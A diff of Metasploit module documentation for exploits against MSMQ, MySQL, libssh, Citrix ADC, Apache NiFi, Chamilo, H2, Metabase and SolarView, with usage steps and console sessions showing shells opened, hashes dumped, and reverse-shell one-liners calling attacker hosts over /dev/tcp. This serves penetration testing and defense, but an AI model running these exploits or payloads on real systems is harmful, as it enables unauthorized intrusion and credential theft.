+- Windows 10 1607 (up to and excluding 10.0.14393.5850)
+- Windows 10 1809 (up to and excluding 10.0.17763.4252)
+- Windows 10 20h2 (up to and excluding 10.0.19042.2846)
+- Windows 10 21h2 (up to and excluding 10.0.19044.2846)
+- Windows 10 22h2 (up to and excluding 10.0.19045.2846)
+- Windows 11 21h2 (up to and excluding 10.0.22000.1817)
+- Windows 11 22h2 (up to and excluding 10.0.22621.1555)
+- Windows Server 2003
+- Windows Server 2003 R2
+- Windows Server 2008 SP2
+- Windows Server 2008 R2 SP1
+- Windows Server 2012
+- Windows Server 2012 R2
+- Windows Server 2016
+- Windows Server 2019
+- Windows Server 2022
+
+## Verification Steps
+
+  1. Set up a Windows target (Server 2008, Server 2008 R2, Windows 10, etc.).
+  2. Start msfconsole.
+  3. Load the module: `use auxiliary/scanner/msmq/cve_2023_21554_queuejumper`
+  4. Specify the IP address of one or more targets: `set RHOSTS 192.168.0.1-10`
+  5. Optionally, change the remote port (defaults to `1801`): `set RPORT 1840`
+  6. Launch the scanner: `run`
+
+## Scenarios
+
+#### A vulnerable version of MSMQ within Microsoft Windows
+If MSMQ is installed on the target and is lacking [security updates](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554), the module will flag the service as vulnerable:
+
+```
+[*] 192.168.0.10:1801   - MSMQ detected. Checking for CVE-2023-21554
+[+] 192.168.0.10:1801   - MSMQ vulnerable to CVE-2023-21554 - QueueJumper!
+[*] Auxiliary module execution completed
+```
+
+#### A patched version of MSMQ
+If the target has MSMQ running and applied the [security updates](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554), the service is flagged as not vulnerable:
+
+```
+[*] 192.168.0.10:1801   - MSMQ detected. Checking for CVE-2023-21554
+[-] 192.168.0.10:1801   - No response received, MSMQ seems to be patched
+[*] Auxiliary module execution completed
+```
+
+#### A service that is not MSMQ
+A non-MSMQ service will be detected by the module:
+
+```
+[-] 192.168.0.10:22      - Service does not look like MSMQ
+[*] Auxiliary module execution completed
+```
+
+#### A non-accessible service
+A host that either does not exist or is not reachable will be highlighted in an error message:
+
+```
+[-] 192.168.0.11:1801      - Unable to connect to the service
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,50 @@
+## Description
+
+This module exploits a password bypass vulnerability in MySQL in order
+to extract the usernames and encrypted password hashes from a MySQL server.
+These hashes are stored as loot for later cracking.
+
+Impacts MySQL versions:
+- 5.1.x before 5.1.63
+- 5.5.x before 5.5.24
+- 5.6.x before 5.6.6
+
+And MariaDB versions:
+- 5.1.x before 5.1.62
+- 5.2.x before 5.2.12
+- 5.3.x before 5.3.6
+- 5.5.x before 5.5.23
+
+## Environment Setup
+
+### Docker
+
+```
+docker run -it --rm -p 3306:3306 vulhub/mysql:5.5.23
+```
+
+## Verification Steps
+
+1. Do: `use scanner/mysql/mysql_authbypass_hashdump`
+2. Do: `set RHOSTS [IP]`
+3. Do: `run`
+
+## Scenarios
+
+```msf
+msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > rerun rhost=127.0.0.1
+[*] Reloading module...
+
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 The server allows logins, proceeding with bypass test
+[*] 127.0.0.1:3306        - 127.0.0.1:3306 Authentication bypass is 10% complete
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Successfully bypassed authentication after 130 attempts. URI: mysql://root:Gmg@127.0.0.1:3306
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
+[+] 127.0.0.1:3306        - 127.0.0.1:3306 Hash Table has been saved: /Users/adfoster/.msf4/loot/20230817230919_default_127.0.0.1_mysql.hashes_036424.txt
+[*] 127.0.0.1:3306        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -14,6 +14,87 @@ additional code paths to be followed.

 ## Setup

+### Docker (Vulhub)
+
+A prebuilt [vulhub](https://github.com/vulhub/vulhub) target is available for testing. This target does _not_ work with the `Shell` action, only the `Execute` action. To test that scenario, use the `Docker (Custom)` steps below.
+
+```
+docker run -it -p 3333:22 vulhub/libssh:0.8.1
+```
+
+### Docker (Custom)
+
+In an empty folder create a new `Dockerfile` with the below file contents. Note that this Dockerfile is based on [vulhub/libssh:0.8.1](https://github.com/vulhub/vulhub/tree/4b1954c5c95140d99a4b94a7005707dd041196f6/base/libssh/0.8.1) with changes to work with the `Shell` target:
+
+```Dockerfile
+FROM buildpack-deps:stable-scm
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY ssh_server_fork.patch /ssh_server_fork.patch
+
+RUN set -ex \
+    && BUILDDEP="gcc g++ make pkg-config cmake xz-utils patch" \
+    && apt-get update \
+    && apt-get install --no-install-recommends -y \
+        ca-certificates \
+        wget \
+        libc6-dev \
+        zlib1g-dev \
+        libgcrypt20-dev \
+        libgpg-error-dev \
+        $BUILDDEP \
+    && wget -qO- https://www.libssh.org/files/0.8/libssh-0.8.3.tar.xz \
+        | xz -c -d | tar x -C /usr/src --strip-components=1 \
+    && mkdir -p /usr/src/build \
+    && patch /usr/src/examples/ssh_server_fork.c < /ssh_server_fork.patch \
+    && cd /usr/src/build \
+    && cmake \
+        -DCMAKE_INSTALL_PREFIX=/usr \
+        -DWITH_SERVER=ON \
+        -DWITH_STATIC_LIB=ON \
+        -DWITH_GSSAPI=ON \
+        -DWITH_GCRYPT=ON \
+        -DWITH_SFTP=ON \
+        -DWITH_THREADS=ON \
+        .. \
+    && make && make install \
+    && apt-get purge -y --auto-remove $BUILDDEP
+
+RUN ssh-keygen -t ecdsa -m pem -f /etc/ssh/ssh_host_ecdsa_key -q -N "" \
+    && ssh-keygen -t dsa -m pem -f /etc/ssh/ssh_host_dsa_key -q -N "" \
+    && ssh-keygen -t rsa -m pem -b 2048 -f /etc/ssh/ssh_host_rsa_key -q -N ""
+
+CMD /usr/src/build/examples/ssh_server_fork --hostkey=/etc/ssh/ssh_host_rsa_key --ecdsakey=/etc/ssh/ssh_host_ecdsa_key --dsakey=/etc/ssh/ssh_host_dsa_key --rsakey=/etc/ssh/ssh_host_rsa_key -p 22 0.0.0.0
+```
+
+Ensure the Metasploit patch is present in the same directory:
+
+```
+cp /path/to/metasploit-framework/external/source/libssh/ssh_server_fork.patch .
+```
+
+Expected directory structure:
+
+```
+Dockerfile
+ssh_server_fork.patch
+```
+
+Build the image:
+
+```
+docker build -t libssh:vulnerable .
+```
+
+Create a new container available on port `2222`:
+
+```
+docker run -it -p 2222:22 libssh:vulnerable
+```
+
+### Host
+
 1. `git clone git://git.libssh.org/projects/libssh.git`
 2. `cd libssh` and `git checkout libssh-0.8.3`
 3. `git apply -p1 /path/to/metasploit-framework/external/source/libssh/ssh_server_fork.patch`
@@ -0,0 +1,74 @@
+## Vulnerable Application
+
+A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of
+the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in remote code
+execution as root.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/freebsd/http/citrix_formssso_target_rce`
+4. Set the `RHOST`, `PAYLOAD` and payload-related options
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Citrix ADC 13.1-48.47
+
+NetScaler VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
+
+```
+msf6 exploit(freebsd/http/citrix_formssso_target_rce) > show options 
+
+Module options (exploit/freebsd/http/citrix_formssso_target_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.130  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Citrix ADC 13.1-48.47
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/citrix_formssso_target_rce) > run
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Sending stage (24768 bytes) to 192.168.159.30
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.30:36429) at 2023-07-31 17:34:18 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : cirtrix
+OS           : FreeBSD 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 2596b10c4(rs_131_48_41_RTM): Sat Jun  3 00:57:48 PDT 2023     root@sjc-bld-bsd114-232:/usr/obj/usr/home/build/adc/usr.src/sys/NS64
+Architecture : x64
+Meterpreter  : python/freebsd
+meterpreter > pwd
+/
+meterpreter > 
+```
@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+The DBCPConnectionPool and HikariCPConnectionPool Controller Services in
+Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user
+to configure a Database URL with the H2 driver that enables custom code execution.
+This exploit will create a new ExecuteSQL process, connect it to a DB Connection
+Pool, and create a new H2 based connection.  The connection is able to create
+a new memory based h2 database on the fly, with a code execution inlined that
+executes when the H2 connection, and process are started.
+
+This exploit will result in several shells (5-7).
+Successfully tested against Apache nifi 1.16.0 through 1.21.0.
+
+### Vulnerable Docker Images
+
+Docker images are available, and exploitable in the default configuration.
+
+```
+docker run -p 8443:8443 apache/nifi:1.20.0
+```
+
+After the image runs for a minute or two, you'll need to grab a set of credentials
+by running grep against the logs:
+
+```
+docker logs [container_id] | grep Generated
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_nifi_h2_rce `
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `set rhosts [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### DELAY
+
+The delay time before stopping and deleting the processor and DB connection pool. Defaults to `15`
+
+## Scenarios
+
+### Nifi 1.20.0 on Docker
+
+```
+msf6 > use exploit/linux/http/apache_nifi_h2_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set username 4b6caac4-e1c6-431d-8e63-f014a6541362
+username => 4b6caac4-e1c6-431d-8e63-f014a6541362
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set password E3ke7kCROjBabztg0acFemg5xk2QiQs1
+password => E3ke7kCROjBabztg0acFemg5xk2QiQs1
+msf6 exploit(linux/http/apache_nifi_h2_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/apache_nifi_h2_rce) > exploit
+
+[+] bash -c '0<&126-;exec 126<>/dev/tcp/1.1.1.1/4444;sh <&126 >&126 2>&126'
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Apache NiFi instance supports logins and vulnerable version detected: 1.20.0
+[+] Retrieved process group: c34bfd91-0189-1000-a1ab-44dda04d471e
+[+] Created processor c34ccd20-0189-1000-5ee2-06eb40644237 in process group c34bfd91-0189-1000-a1ab-44dda04d471e
+[+] Configured processor c34ccd20-0189-1000-5ee2-06eb40644237
+[+] Configured db connection pool rkkIaE (c34cccc4-0189-1000-22c2-9fa3bb57d87b)
+[+] Enabling db connection pool
+[+] Starting processor
+[*] Command shell session 1 opened (1.1.1.1:4444 -> 172.17.0.2:49468) at 2023-08-04 21:25:44 -0400
+[*] Waiting 15 seconds before stopping and deleting
+[*] Command shell session 2 opened (1.1.1.1:4444 -> 172.17.0.2:49470) at 2023-08-04 21:25:45 -0400
+[*] Command shell session 3 opened (1.1.1.1:4444 -> 172.17.0.2:49478) at 2023-08-04 21:25:46 -0400
+[*] Command shell session 4 opened (1.1.1.1:4444 -> 172.17.0.2:49488) at 2023-08-04 21:25:49 -0400
+[*] Command shell session 6 opened (1.1.1.1:4444 -> 172.17.0.2:54526) at 2023-08-04 21:25:50 -0400
+[*] Command shell session 7 opened (1.1.1.1:4444 -> 172.17.0.2:54534) at 2023-08-04 21:25:51 -0400
+[+] Stopped and terminated processor c34ccd20-0189-1000-5ee2-06eb40644237
+[*] Found newer revision of c34ccd20-0189-1000-5ee2-06eb40644237, attempting to delete version 4
+[+] Deleted processor c34ccd20-0189-1000-5ee2-06eb40644237
+[+] Disabled db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b, sleeping 15 seconds to allow the connection to finish disabling
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 1
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 2
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 3
+[*] Found newer revision of c34cccc4-0189-1000-22c2-9fa3bb57d87b, attempting to delete version 4
+[+] Deleted db connection pool c34cccc4-0189-1000-22c2-9fa3bb57d87b
+
+id
+uid=1000(nifi) gid=1000(nifi) groups=1000(nifi)
+uname -a
+Linux 06967477694d 6.3.0-kali1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.3.7-1kali1 (2023-06-29) x86_64 x86_64 x86_64 GNU/Linux
+```
@@ -0,0 +1,162 @@
+## Vulnerable Application
+`Chamilo` is an e-learning platform, also called Learning Management Systems (LMS).
+This module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions `1.11.18`
+and below. See [CVE-2023-34960](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34960).
+Due to a functionality called `Chamilo Rapid` to easily convert PowerPoint slides to courses on Chamilo,
+it is possible for an unauthenticated remote attacker to execute arbitrary commands at OS level using a malicious SOAP
+request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
+
+Read this [article](https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960) on attackerkb.com for more details.
+
+This module has been tested against Chamilo 1.11.18 on Ubuntu Linux 22.04 with PHP 7.4
+
+### Installation
+Instructions for a Chamilo installation on Ubuntu 22.04:
+1. Download and install Ubuntu 22.04 server on VirtualBox (follow these [instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/)).
+2. Download and install LAMP on Ubuntu 22.04 server (follow these [instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/)).
+3. Download Chamilo releases [here](https://github.com/chamilo/chamilo-lms/releases).
+4. Follow installation instructions [here](https://11.chamilo.org/documentation/installation_guide.html#1._Pre-requisites).
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <ip-attacker>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter`
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > options
+
+Module options (exploit/linux/http/chamilo_unauth_rce_cve_2023_34960):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                         cs/using-metasploit.html
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The Chamilo endpoint URL
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                        local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+   When TARGET is 0:
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   WEBSHELL                   no        The name of the webshell with extension. Webshell name will be randomly generat
+                                        ed if left unset.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   PHP
+```
+## Options
+
+### TARGETURI
+The uripath to the `Chamilo` web application. Default set is to `/`.
+
+### WEBSHELL
+You can use this option to set the filename and extension (should be .php) of the webshell.
+This is handy if you want to test the webshell upload and execution with different file names.
+to bypass any security settings on the Web and PHP server.
+
+## Scenarios
+### Ubuntu 22.04 PHP - php/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing PHP for php/meterpreter/reverse_tcp
+[*] Sending stage (39927 bytes) to 192.168.201.47
+[+] Deleted cfLzNvTgdlp.php
+[*] Meterpreter session 23 opened (192.168.201.10:4444 -> 192.168.201.47:42220) at 2023-07-28 20:29:19 +0000
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : cuckoo
+OS          : Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+### Ubuntu 22.04 Unix Command - cmd/unix/reverse_bash
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 1
+target => 1
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 24 opened (192.168.201.10:4444 -> 192.168.201.47:32810) at 2023-07-28 20:30:48 +0000
+
+uname -a
+Linux cuckoo 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+### Ubuntu 22.04 Linux Dropper - linux/x64/meterpreter/reverse_tcp
+```
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > set target 2
+target => 2
+msf6 exploit(linux/http/chamilo_unauth_rce_cve_2023_34960) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.10:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.47:80 can be exploited.
+[+] The target is vulnerable.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.201.10:1981/hexZf4ppmqBlG
+[*] Client 192.168.201.47 (Wget/1.21.2) requested /hexZf4ppmqBlG
+[*] Sending payload to 192.168.201.47 (Wget/1.21.2)
+[*] Sending stage (3045348 bytes) to 192.168.201.47
+[*] Meterpreter session 25 opened (192.168.201.10:4444 -> 192.168.201.47:55508) at 2023-07-28 20:32:02 +0000
+[*] Command Stager progress - 100.00% done (120/120 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 192.168.201.47
+OS           : Ubuntu 22.04 (Linux 5.15.0-76-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/var/www/html/chamilo/main/inc/lib/ppt2png
+meterpreter >
+```
+
+## Limitations
+No limitations.
@@ -0,0 +1,81 @@
+## Vulnerable Application
+
+The H2 database contains an alias function which allows for arbitrary Java code to be used.
+This functionality can be abused to create an exec functionality to pull our payload down
+and execute it. H2's web interface contains restricts MANY characters, so injecting a payload
+directly is not favorable. A valid database connection is required. If the database engine
+was configured to allow creation of databases, the module default can be used which
+utilizes an in memory database. Some Docker instances of H2 don't allow writing to
+folders such as /tmp, so we default to writing to the working directory of the software.
+
+This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)
+
+### Application Install
+
+The `ifNotExists` option is used to allow for creation of new databases from the web interface. This substantially speeds
+up testing of the exploit.
+
+```
+docker run -d -p 1521:1521 -p 81:81 -v /path/to/local/data_dir:/opt/h2-data -e H2_OPTIONS=-ifNotExists --name=MyH2Instance oscarfonts/h2
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/h2_webinterface_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `set rport [port]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### DATABASE
+
+The database to connect to. If a default was already filled in, it is shown during module execution.
+Defaults to `jdbc:h2:mem:` which is an in-memory DB to avoid writing to disc.
+
+### GETVERSION
+
+Will retrieve the version of the server. Most likely only works on 2.0.0+. Defaults to `true`
+
+## Scenarios
+
+### H2 Version 2.1.214 from Docker
+
+```
+msf6 > use exploit/linux/http/h2_webinterface_rce
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/h2_webinterface_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/h2_webinterface_rce) > set rport 81
+rport => 81
+msf6 exploit(linux/http/h2_webinterface_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/h2_webinterface_rce) > set lhost 111.111.11.111
+lhost => 111.111.11.111
+msf6 exploit(linux/http/h2_webinterface_rce) > set srvhost 111.111.11.111
+srvhost => 111.111.11.111
+msf6 exploit(linux/http/h2_webinterface_rce) > exploit
+
+[*] Started reverse TCP handler on 111.111.11.111:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Obtaining jsessionid (cookie equivalent)
+[+] jsessionid (cookie equivalent): ec97655f1aa8e1132fd8bd0e5581d9f0
+[*] Detected autofilled DB: jdbc:h2:mem:
+[+] The target is vulnerable. 127.0.0.1:81 - H2 web interface found, and database connection successful
+[*] Obtaining jsessionid (cookie equivalent)
+[+] jsessionid (cookie equivalent): 9828fc9f6bd0de76e0c88f44a07fc7bb
+[+] H2 Version detected: 2.1.214
+[*] Using URL: http://111.111.11.111:8080/D1OHj7
+[*] Saving payload as AYZER67Th.sh
+[*] Attempting to execute payload retrieval
+[+] Received payload request
+[*] Sending stage (24772 bytes) to 222.222.2.2
+[*] Meterpreter session 1 opened (111.111.11.111:4444 -> 222.222.2.2:43968) at 2023-07-27 16:44:03 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
+is accessible even after the setup process has been completed. With this token
+a user is able to submit the setup functionality to create a new database.
+When creating a new database, an H2 database string is created with a TRIGGER
+that allows for code execution. We use a sample database for our connection
+string to prevent corrupting real databases.
+
+Successfully tested against Metabase 0.46.6.
+
+### Install
+
+```
+docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.46.6
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/metabase_setup_token_rce`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Metabase 0.46.6 on Docker
+
+```
+msf6 > use exploit/linux/http/metabase_setup_token_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/metabase_setup_token_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(linux/http/metabase_setup_token_rce) > set lhost 111.111.11.111
+lhost => 111.111.11.111
+msf6 exploit(linux/http/metabase_setup_token_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/metabase_setup_token_rce) > exploit
+
+[+] bash -c '0<&46-;exec 46<>/dev/tcp/111.111.11.111/4444;sh <&46 >&46 2>&46'
+[*] Started reverse TCP handler on 111.111.11.111:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.46.6
+[+] Found setup token: 45a2c97a-97f5-4a89-8f37-769b13411d16
+[*] Sending exploit
+[*] Command shell session 1 opened (111.111.11.111:4444 -> 222.22.2.2:55650) at 2023-07-28 12:48:47 +0000
+
+id
+uid=2000(metabase) gid=2000(metabase) groups=2000(metabase),2000(metabase)
+```
@@ -0,0 +1,286 @@
+## Vulnerable Application
+`SolarView Compact` has a vulnerability that allows remote code execution on a vulnerable `SolarView Compact` device
+by bypassing internal restrictions through the vulnerable endpoint `downloader.php` using the `file` parameter.
+For more information:
+* Read [Product Overview SolarView Compact](https://www.contec.com/products-services/environmental-monitoring/solarview/)
+* Read this [article](https://attackerkb.com/topics/kE3lzTZGV2/cve-2023-23333) on attackerkb.com for more details.
+
+### Installation
+Ideally, you would need an `SolarView Compact appliance` running embedded Linux on an ARM-32 bit architecture (armle).
+See [SolarView Compact appliance SVT-CPT-MC310](https://www.contec.com/products-services/environmental-monitoring/solarview/pv-package/sv-cpt-mc310/support/#section).
+However, by downloading the firmware and install the `html` and `php` part of the firmware on a Linux distribution
+like Ubuntu or Kali Linux, we can simulate the appliance and test the vulnerable endpoint.
+
+This module has been tested on:
+- [ ] Ubuntu Linux 22.04
+* VirtualBox
+* SolarView Compact v6.00
+* PHP 7.4
+- [ ] Kali Linux 2023.3
+* Raspberry PI
+* SolarView Compact v6.00
+* PHP 8.2
+
+Please follow below instructions below to create the simulation test bed on Ubuntu 22.04.
+Similar instructions apply if you want to test it on an ARM device like a Raspberry PI with Kali Linux.
+Please ensure that you install ARM-32 bit support.
+```console
+dpkg --add-architecture armhf
+apt -y update
+```
+
+**Instructions for an SolarView Compact  firmware simulation installation on Ubuntu 22.04:**
+* Download and install Ubuntu 22.04 server on VirtualBox.
+* [Follow these instructions](https://linux.how2shout.com/how-to-install-ubuntu-22-04-server-on-virtualbox/).
+* Download and install LAMP on Ubuntu 22.04 server.
+* [Follow these instructions](https://linux.how2shout.com/2-ways-to-install-lamp-server-on-ubuntu-22-04-20-04/).
+
+**Follow below steps to install the firmware and create the simulation test bed:**
+* Login into Ubuntu 22.04 as root.
+* Download [firmware v6.00](https://www.contec.com/download/contract/contract2/?itemid=b28c8b7c-9f40-40b2-843c-b5b04c035b0e&downloaditemid=d76a935b-adbc-45ff-b80f-6f651c1af463).
+* Save firmware in `/tmp` directory. You need to register first.
+* Add the user `contec`.
+```console
+adduser --home /home/contec --gid 0 --shell /bin/bash contec --disabled-password --gecos ''
+```
+* Create following directories and symbolic links:
+```console
+mkdir /home/www
+mkdir /opt/svc
+ln -s /var/www/html /home/www/html
+ln -s /tmp /home/www/html/tmp
+```
+* Extract the `html` directory and `version` file from the firmware in `/home/www/html` with the following commands:
+```console
+cd /home/www/
+tar -zxvf/tmp/svcUpdateV600.fpk --wildcards 'html/*' 'version'
+mv version /opt/svc
+chown -R contec.root /home/www/html/*
+chown contec.root /opt/svc/version
+```
+* You should have a `/home/www/html` directory with the vulnerable endpoint `downloader.php` and the version file stored in `/opt/svc`
+* Create a dummy `data_zip.sh` shell script in `/usr/local/bin` which is called from `downloader.php` and will trigger the RCE.
+```console
+echo '#!/bin/bash' > /usr/local/bin/data_zip.sh; chmod 755 /usr/local/bin/data_zip.sh
+```
+* Add the `short_open_tag On` setting in `php.ini`. You should check your php version to ensure that you edit the right file.
+```console
+php -v
+nano /etc/php/7.4/apache2/php.ini 
+```
+* Configure your apache server to run under the user context `contec` by editing  `/etc/apache2/envvars`.
+* Update the lines with environment variable `export APACHE_RUN_USER=contec` and `export APACHE_RUN_GROUP=root`.
+```console
+nano /etc/apache2/envvars
+systemctl start apache2
+```
+* Test the module using the verification steps below.
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/solarview_unauth_rce_cve_2023_23333`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ] `set lhost <ip-attacker>`
+- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter`
+```
